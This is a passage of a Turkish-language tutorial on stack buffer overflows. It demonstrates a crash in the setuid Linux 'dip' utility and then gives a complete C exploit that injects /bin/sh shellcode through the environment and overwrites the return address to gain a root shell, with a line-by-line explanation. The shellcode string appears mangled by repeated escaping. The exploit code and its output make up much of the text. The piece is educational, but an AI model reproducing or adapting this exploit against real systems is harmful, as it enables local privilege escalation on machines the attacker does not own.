kopyaliyor. Iste burada yapacagimiz sey de bu buffera shell kodumuzun
adresini ’dikkatlice’ yerlestirmek.
[mnml@victim mnml]$ /usr/sbin/dip -k -l `perl -e ’print "A"x116’`
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open
/var/lock/LCK..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
No such file or directory
[mnml@victim mnml]$ /usr/sbin/dip -k -l `perl -e ’print "A"x117’`
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open
/var/lock/LCK..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
No such file or directory
Segmentation fault (core dumped)
[mnml@victim mnml]$
Yukarida gordugunuz gibi, dip’in -l switch’ine 116’dan fazla deger
girdiginizde (mesela 117) return adresi override etmis oluyorsunuz :)
Bu da stpcpy ’de bufferin kopyalandigi yerden sonra 117. byte da
RET basliyor demek.
Simdi exploit:
/* /usr/sbin/dip | euid = 0 | mnml@r00t.us */
#include
#include
#include
#define BUFSIZE 250
char sc[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
void main()
{
char *env[2] = {sc, NULL};
char buf[BUFSIZE] = "A";
int i;
int *ap = (int *)(buf + strlen(buf));
int ret = 0xbffffffa - strlen(sc) - strlen("/usr/sbin/dip");
for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
execle("/usr/sbin/dip", "dip", "-k", "-l", buf, NULL, env);
}
Simdi exploitimizi aciklayalim:
BUFFER buyuklugunu 250 byte olarak belirliyoruz, ki 117’den fazla hersey olur
burda. (Fakat bu, her bir exploit icin gecerli degil. Detaylar bir sonraki
dokumanda.)
shell kodumuzu yaziyoruz, ve simdi de main():
shell kodumuzun adresini sakliyacagimiz 2 birimlik bir environment pointer
atiyoruz. Bunun birinci elemaninda shell kodun adresini, digerine de NULL
atiyoruz (execve() boyle istiyor):
char *env[2] = {sc, NULL};
Sonra buffer’imiz icin yer ariyoruz. Bu buffer’i -l switch’ine paremetre
verecegiz. Burda bir tek A koymamiz, ALIGNMENT icin. Hafiza cogumuzun
kullandigi 32 bit islemcilerde 4 byte’lik bolmeler halinde adreslenir.
Dolayisiyla RET’in baslama ve bitimi arasinda 4 byte var. Bizim buffer’imiz
117 byte’dan sonra override ediyor RET’i. 117 4’un kati degil. ona en yakin ve
ondan kucuk 116 var. 1 eksik. O zaman buffer’a bir adet A yazalim ve de dorder
dorder ilerleyerek RET’i shell kodun adresi ile override edelim:
char buf[BUFSIZE] = "A";
Adres pointer’imiz buffer’in A’dan sonraki ilk bolumune isaret ediyor:
int *ap = (int *)(buf + strlen(buf));
RET adresimizi kesin hesapliyoruz, detaylari icin yukariya bakin.
int ret = 0XBFFFFFFA - strlen(sc) - strlen("/usr/sbin/dip");
Dorder dorder ilerleyip, ret’in degerini buffer’in icine dolduralim. Burada
neden *ap’nin degerini 4 artirmiyoruz derseniz, zaten ap bir pointer onun
degerini bir artirmak demek, adresin degerini 4 artirmak demektir:
for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
Ve geriye kalan sadece execve. Once vulnerable programin full path’i,
programin ismi, NULL ile biten argumanlar dizisi ve environment pointer’i
execle’ye paremetre olarak veriyoruz:
execle("/usr/sbin/dip", "dip", "-k", "-l", buf, NULL, env);
Word Doc > http://rapidshare.de/files/47752523/bof.rtf.html
Kaydol:
Kayıtlar (Atom)